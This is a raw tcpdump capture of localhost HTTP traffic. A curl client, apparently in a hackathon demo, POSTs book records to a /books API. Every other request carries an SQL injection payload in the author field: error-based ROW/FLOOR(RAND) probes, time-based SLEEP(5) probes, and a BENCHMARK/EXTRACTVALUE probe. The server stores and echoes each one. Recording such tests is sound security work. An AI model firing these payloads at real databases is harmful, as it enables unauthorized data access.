20:40:59.390693 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53810 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xdaf8), seq 35627335, win 43690, options [mss 65476,sackOK,TS val 3879654 ecr 0,nop,wscale 7], length 0
20:40:59.390728 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53810: Flags [S.], cksum 0x0030 (incorrect -> 0xd3a9), seq 3679451340, ack 35627336, win 43690, options [mss 65476,sackOK,TS val 3879654 ecr 3879654,nop,wscale 7], length 0
20:40:59.390749 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53810 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa5db), seq 1, ack 1, win 342, options [nop,nop,TS val 3879654 ecr 3879654], length 0
20:40:59.390866 IP6 (hlim 64, next-header TCP (6) payload length: 428) ::1.53810 > ::1.8080: Flags [P.], cksum 0x01b4 (incorrect -> 0xc458), seq 1:397, ack 1, win 342, options [nop,nop,TS val 3879655 ecr 3879654], length 396: HTTP, length: 396
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 260
	
	{"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":"9.99"}[!http]
20:40:59.390880 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53810: Flags [.], cksum 0x0028 (incorrect -> 0xa445), seq 1, ack 397, win 350, options [nop,nop,TS val 3879655 ecr 3879655], length 0
20:40:59.395130 IP6 (hlim 64, next-header TCP (6) payload length: 434) ::1.8080 > ::1.53810: Flags [P.], cksum 0x01ba (incorrect -> 0x50c2), seq 1:403, ack 397, win 350, options [nop,nop,TS val 3879659 ecr 3879655], length 402: HTTP, length: 402
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	10b
	{"id":248,"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":9.99}
20:40:59.395147 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53810 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa2ab), seq 397, ack 403, win 350, options [nop,nop,TS val 3879659 ecr 3879659], length 0
20:40:59.395410 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53810: Flags [P.], cksum 0x002d (incorrect -> 0x5e84), seq 403:408, ack 397, win 350, options [nop,nop,TS val 3879659 ecr 3879659], length 5: HTTP
20:40:59.395424 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53810 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa2a6), seq 397, ack 408, win 350, options [nop,nop,TS val 3879659 ecr 3879659], length 0
20:40:59.396005 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53810 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xa2a4), seq 397, ack 408, win 350, options [nop,nop,TS val 3879660 ecr 3879659], length 0
20:40:59.397032 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53810: Flags [F.], cksum 0x0028 (incorrect -> 0xa2a1), seq 408, ack 398, win 350, options [nop,nop,TS val 3879661 ecr 3879660], length 0
20:40:59.397077 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53810 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa2a0), seq 398, ack 409, win 350, options [nop,nop,TS val 3879661 ecr 3879661], length 0
20:40:59.405529 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53812 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x6d72), seq 891476921, win 43690, options [mss 65476,sackOK,TS val 3879669 ecr 0,nop,wscale 7], length 0
20:40:59.405552 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53812: Flags [S.], cksum 0x0030 (incorrect -> 0x2b54), seq 3215675185, ack 891476922, win 43690, options [mss 65476,sackOK,TS val 3879669 ecr 3879669,nop,wscale 7], length 0
20:40:59.405572 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53812 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xfd85), seq 1, ack 1, win 342, options [nop,nop,TS val 3879669 ecr 3879669], length 0
20:40:59.405662 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53812 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x0133), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3879669 ecr 3879669], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo1","author":"Ramesh-P","price":"9.99"}[!http]
20:40:59.405677 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53812: Flags [.], cksum 0x0028 (incorrect -> 0xfcb9), seq 1, ack 197, win 350, options [nop,nop,TS val 3879669 ecr 3879669], length 0
20:40:59.408502 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53812: Flags [P.], cksum 0x00f2 (incorrect -> 0x140a), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3879672 ecr 3879669], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	44
	{"id":249,"name":"Hackathon-Demo1","author":"Ramesh-P","price":9.99}
20:40:59.408521 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53812 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xfbe9), seq 197, ack 203, win 350, options [nop,nop,TS val 3879672 ecr 3879672], length 0
20:40:59.408779 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53812: Flags [P.], cksum 0x002d (incorrect -> 0xb7c2), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3879672 ecr 3879672], length 5: HTTP
20:40:59.408797 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53812 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xfbe4), seq 197, ack 208, win 350, options [nop,nop,TS val 3879672 ecr 3879672], length 0
20:40:59.409085 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53812 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xfbe2), seq 197, ack 208, win 350, options [nop,nop,TS val 3879673 ecr 3879672], length 0
20:40:59.409980 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53812: Flags [F.], cksum 0x0028 (incorrect -> 0xfbdf), seq 208, ack 198, win 350, options [nop,nop,TS val 3879674 ecr 3879673], length 0
20:40:59.409997 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53812 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xfbde), seq 198, ack 209, win 350, options [nop,nop,TS val 3879674 ecr 3879674], length 0
20:40:59.418627 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53814 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x6be2), seq 1658171271, win 43690, options [mss 65476,sackOK,TS val 3879682 ecr 0,nop,wscale 7], length 0
20:40:59.418681 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53814: Flags [S.], cksum 0x0030 (incorrect -> 0x62f3), seq 2593733383, ack 1658171272, win 43690, options [mss 65476,sackOK,TS val 3879682 ecr 3879682,nop,wscale 7], length 0
20:40:59.418729 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53814 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3525), seq 1, ack 1, win 342, options [nop,nop,TS val 3879682 ecr 3879682], length 0
20:40:59.418831 IP6 (hlim 64, next-header TCP (6) payload length: 239) ::1.53814 > ::1.8080: Flags [P.], cksum 0x00f7 (incorrect -> 0xda8a), seq 1:208, ack 1, win 342, options [nop,nop,TS val 3879682 ecr 3879682], length 207: HTTP, length: 207
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 72
	
	{"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":"9.99"}[!http]
20:40:59.418874 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53814: Flags [.], cksum 0x0028 (incorrect -> 0x344d), seq 1, ack 208, win 350, options [nop,nop,TS val 3879683 ecr 3879682], length 0
20:40:59.421544 IP6 (hlim 64, next-header TCP (6) payload length: 245) ::1.8080 > ::1.53814: Flags [P.], cksum 0x00fd (incorrect -> 0xe437), seq 1:214, ack 208, win 350, options [nop,nop,TS val 3879685 ecr 3879682], length 213: HTTP, length: 213
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	4f
	{"id":250,"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":9.99}
20:40:59.421561 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53814 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3373), seq 208, ack 214, win 350, options [nop,nop,TS val 3879685 ecr 3879685], length 0
20:40:59.421822 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53814: Flags [P.], cksum 0x002d (incorrect -> 0xef4b), seq 214:219, ack 208, win 350, options [nop,nop,TS val 3879685 ecr 3879685], length 5: HTTP
20:40:59.421856 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53814 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x336e), seq 208, ack 219, win 350, options [nop,nop,TS val 3879685 ecr 3879685], length 0
20:40:59.421935 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53814 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x336c), seq 208, ack 219, win 350, options [nop,nop,TS val 3879686 ecr 3879685], length 0
20:40:59.423887 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53814: Flags [F.], cksum 0x0028 (incorrect -> 0x3368), seq 219, ack 209, win 350, options [nop,nop,TS val 3879688 ecr 3879686], length 0
20:40:59.423905 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53814 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3366), seq 209, ack 220, win 350, options [nop,nop,TS val 3879688 ecr 3879688], length 0
20:40:59.431918 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53816 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x3980), seq 1350366258, win 43690, options [mss 65476,sackOK,TS val 3879696 ecr 0,nop,wscale 7], length 0
20:40:59.431986 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53816: Flags [S.], cksum 0x0030 (incorrect -> 0x6111), seq 728725923, ack 1350366259, win 43690, options [mss 65476,sackOK,TS val 3879696 ecr 3879696,nop,wscale 7], length 0
20:40:59.432035 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53816 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3343), seq 1, ack 1, win 342, options [nop,nop,TS val 3879696 ecr 3879696], length 0
20:40:59.432153 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53816 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x34f0), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3879696 ecr 3879696], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo3","author":"Ramesh-P","price":"9.99"}[!http]
20:40:59.432187 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53816: Flags [.], cksum 0x0028 (incorrect -> 0x3277), seq 1, ack 197, win 350, options [nop,nop,TS val 3879696 ecr 3879696], length 0
20:40:59.434706 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53816: Flags [P.], cksum 0x00f2 (incorrect -> 0x4fc7), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3879698 ecr 3879696], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	44
	{"id":251,"name":"Hackathon-Demo3","author":"Ramesh-P","price":9.99}
20:40:59.434724 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53816 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x31a9), seq 197, ack 203, win 350, options [nop,nop,TS val 3879698 ecr 3879698], length 0
20:40:59.435066 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53816: Flags [P.], cksum 0x002d (incorrect -> 0xed80), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3879699 ecr 3879698], length 5: HTTP
20:40:59.435083 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53816 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x31a2), seq 197, ack 208, win 350, options [nop,nop,TS val 3879699 ecr 3879699], length 0
20:40:59.435354 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53816 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x31a1), seq 197, ack 208, win 350, options [nop,nop,TS val 3879699 ecr 3879699], length 0
20:40:59.436754 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53816: Flags [F.], cksum 0x0028 (incorrect -> 0x319f), seq 208, ack 198, win 350, options [nop,nop,TS val 3879700 ecr 3879699], length 0
20:40:59.436771 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53816 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x319e), seq 198, ack 209, win 350, options [nop,nop,TS val 3879700 ecr 3879700], length 0
20:40:59.450867 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53818 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x1c6e), seq 2092426485, win 43690, options [mss 65476,sackOK,TS val 3879714 ecr 0,nop,wscale 7], length 0
20:40:59.450928 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53818: Flags [S.], cksum 0x0030 (incorrect -> 0xb53a), seq 658836607, ack 2092426486, win 43690, options [mss 65476,sackOK,TS val 3879715 ecr 3879714,nop,wscale 7], length 0
20:40:59.450984 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53818 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x876b), seq 1, ack 1, win 342, options [nop,nop,TS val 3879715 ecr 3879715], length 0
20:40:59.451091 IP6 (hlim 64, next-header TCP (6) payload length: 240) ::1.53818 > ::1.8080: Flags [P.], cksum 0x00f8 (incorrect -> 0x0fc7), seq 1:209, ack 1, win 342, options [nop,nop,TS val 3879715 ecr 3879715], length 208: HTTP, length: 208
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 73
	
	{"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":"9.99"}[!http]
20:40:59.451108 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53818: Flags [.], cksum 0x0028 (incorrect -> 0x8693), seq 1, ack 209, win 350, options [nop,nop,TS val 3879715 ecr 3879715], length 0
20:40:59.453940 IP6 (hlim 64, next-header TCP (6) payload length: 246) ::1.8080 > ::1.53818: Flags [P.], cksum 0x00fe (incorrect -> 0x2a96), seq 1:215, ack 209, win 350, options [nop,nop,TS val 3879718 ecr 3879715], length 214: HTTP, length: 214
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	50
	{"id":252,"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":9.99}
20:40:59.453960 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53818 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x85b7), seq 209, ack 215, win 350, options [nop,nop,TS val 3879718 ecr 3879718], length 0
20:40:59.454273 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53818: Flags [P.], cksum 0x002d (incorrect -> 0x4190), seq 215:220, ack 209, win 350, options [nop,nop,TS val 3879718 ecr 3879718], length 5: HTTP
20:40:59.454289 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53818 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x85b2), seq 209, ack 220, win 350, options [nop,nop,TS val 3879718 ecr 3879718], length 0
20:40:59.454368 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53818 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x85b1), seq 209, ack 220, win 350, options [nop,nop,TS val 3879718 ecr 3879718], length 0
20:40:59.454466 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53818: Flags [F.], cksum 0x0028 (incorrect -> 0x85b0), seq 220, ack 210, win 350, options [nop,nop,TS val 3879718 ecr 3879718], length 0
20:40:59.454482 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53818 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x85b0), seq 210, ack 221, win 350, options [nop,nop,TS val 3879718 ecr 3879718], length 0
20:40:59.469733 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53820 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xfc26), seq 347630887, win 43690, options [mss 65476,sackOK,TS val 3879733 ecr 0,nop,wscale 7], length 0
20:40:59.469759 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53820: Flags [S.], cksum 0x0030 (incorrect -> 0xe122), seq 899330536, ack 347630888, win 43690, options [mss 65476,sackOK,TS val 3879733 ecr 3879733,nop,wscale 7], length 0
20:40:59.469778 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53820 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb354), seq 1, ack 1, win 342, options [nop,nop,TS val 3879733 ecr 3879733], length 0
20:40:59.469894 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53820 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xb300), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3879734 ecr 3879733], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo5","author":"Ramesh-P","price":"9.99"}[!http]
20:40:59.469911 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53820: Flags [.], cksum 0x0028 (incorrect -> 0xb286), seq 1, ack 197, win 350, options [nop,nop,TS val 3879734 ecr 3879734], length 0
20:40:59.473474 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53820: Flags [P.], cksum 0x00f2 (incorrect -> 0xcbd5), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3879737 ecr 3879734], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	44
	{"id":253,"name":"Hackathon-Demo5","author":"Ramesh-P","price":9.99}
20:40:59.473492 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53820 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb1b6), seq 197, ack 203, win 350, options [nop,nop,TS val 3879737 ecr 3879737], length 0
20:40:59.473961 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53820: Flags [P.], cksum 0x002d (incorrect -> 0x6d8e), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3879738 ecr 3879737], length 5: HTTP
20:40:59.473975 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53820 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb1af), seq 197, ack 208, win 350, options [nop,nop,TS val 3879738 ecr 3879738], length 0
20:40:59.474858 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53820 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xb1ae), seq 197, ack 208, win 350, options [nop,nop,TS val 3879738 ecr 3879738], length 0
20:40:59.478272 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53820: Flags [F.], cksum 0x0028 (incorrect -> 0xb1a9), seq 208, ack 198, win 350, options [nop,nop,TS val 3879742 ecr 3879738], length 0
20:40:59.478292 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53820 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb1a5), seq 198, ack 209, win 350, options [nop,nop,TS val 3879742 ecr 3879742], length 0
20:40:59.484301 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53822 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x1985), seq 3652356797, win 43690, options [mss 65476,sackOK,TS val 3879748 ecr 0,nop,wscale 7], length 0
20:40:59.484324 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53822: Flags [S.], cksum 0x0030 (incorrect -> 0xe8c4), seq 2068873695, ack 3652356798, win 43690, options [mss 65476,sackOK,TS val 3879748 ecr 3879748,nop,wscale 7], length 0
20:40:59.484342 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53822 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbaf6), seq 1, ack 1, win 342, options [nop,nop,TS val 3879748 ecr 3879748], length 0
20:40:59.484432 IP6 (hlim 64, next-header TCP (6) payload length: 317) ::1.53822 > ::1.8080: Flags [P.], cksum 0x0145 (incorrect -> 0xb211), seq 1:286, ack 1, win 342, options [nop,nop,TS val 3879748 ecr 3879748], length 285: HTTP, length: 285
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 149
	
	{"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":"9.99"}[!http]
20:40:59.484445 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53822: Flags [.], cksum 0x0028 (incorrect -> 0xb9d1), seq 1, ack 286, win 350, options [nop,nop,TS val 3879748 ecr 3879748], length 0
20:40:59.488388 IP6 (hlim 64, next-header TCP (6) payload length: 322) ::1.8080 > ::1.53822: Flags [P.], cksum 0x014a (incorrect -> 0x5efc), seq 1:291, ack 286, win 350, options [nop,nop,TS val 3879752 ecr 3879748], length 290: HTTP, length: 290
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	9c
	{"id":254,"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":9.99}
20:40:59.488407 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53822 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb8a7), seq 286, ack 291, win 350, options [nop,nop,TS val 3879752 ecr 3879752], length 0
20:40:59.488696 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53822: Flags [P.], cksum 0x002d (incorrect -> 0x7480), seq 291:296, ack 286, win 350, options [nop,nop,TS val 3879752 ecr 3879752], length 5: HTTP
20:40:59.488711 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53822 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb8a2), seq 286, ack 296, win 350, options [nop,nop,TS val 3879752 ecr 3879752], length 0
20:40:59.489124 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53822 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xb8a0), seq 286, ack 296, win 350, options [nop,nop,TS val 3879753 ecr 3879752], length 0
20:40:59.490580 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53822: Flags [F.], cksum 0x0028 (incorrect -> 0xb89d), seq 296, ack 287, win 350, options [nop,nop,TS val 3879754 ecr 3879753], length 0
20:40:59.490597 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53822 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb89c), seq 287, ack 297, win 350, options [nop,nop,TS val 3879754 ecr 3879754], length 0
20:40:59.499579 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53824 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x7288), seq 2043253138, win 43690, options [mss 65476,sackOK,TS val 3879763 ecr 0,nop,wscale 7], length 0
20:40:59.499622 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53824: Flags [S.], cksum 0x0030 (incorrect -> 0x68e9), seq 3624009213, ack 2043253139, win 43690, options [mss 65476,sackOK,TS val 3879763 ecr 3879763,nop,wscale 7], length 0
20:40:59.499654 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53824 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3b1b), seq 1, ack 1, win 342, options [nop,nop,TS val 3879763 ecr 3879763], length 0
20:40:59.499763 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53824 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x38c8), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3879763 ecr 3879763], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo7","author":"Ramesh-P","price":"9.99"}[!http]
20:40:59.499802 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53824: Flags [.], cksum 0x0028 (incorrect -> 0x3a4f), seq 1, ack 197, win 350, options [nop,nop,TS val 3879763 ecr 3879763], length 0
20:40:59.503968 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53824: Flags [P.], cksum 0x00f2 (incorrect -> 0x4f9c), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3879768 ecr 3879763], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:40:59 GMT
	
	44
	{"id":255,"name":"Hackathon-Demo7","author":"Ramesh-P","price":9.99}
20:40:59.503984 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53824 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x397b), seq 197, ack 203, win 350, options [nop,nop,TS val 3879768 ecr 3879768], length 0
20:40:59.504244 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53824: Flags [P.], cksum 0x002d (incorrect -> 0xf553), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3879768 ecr 3879768], length 5: HTTP
20:40:59.504259 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53824 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3976), seq 197, ack 208, win 350, options [nop,nop,TS val 3879768 ecr 3879768], length 0
20:40:59.504643 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53824 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x3975), seq 197, ack 208, win 350, options [nop,nop,TS val 3879768 ecr 3879768], length 0
20:40:59.505868 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53824: Flags [F.], cksum 0x0028 (incorrect -> 0x3973), seq 208, ack 198, win 350, options [nop,nop,TS val 3879769 ecr 3879768], length 0
20:40:59.505884 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53824 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3971), seq 198, ack 209, win 350, options [nop,nop,TS val 3879770 ecr 3879769], length 0
20:40:59.520929 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53826 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x9763), seq 4026594919, win 43690, options [mss 65476,sackOK,TS val 3879785 ecr 0,nop,wscale 7], length 0
20:40:59.520955 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53826: Flags [S.], cksum 0x0030 (incorrect -> 0x71c7), seq 1734707841, ack 4026594920, win 43690, options [mss 65476,sackOK,TS val 3879785 ecr 3879785,nop,wscale 7], length 0
20:40:59.520975 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53826 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x43f9), seq 1, ack 1, win 342, options [nop,nop,TS val 3879785 ecr 3879785], length 0
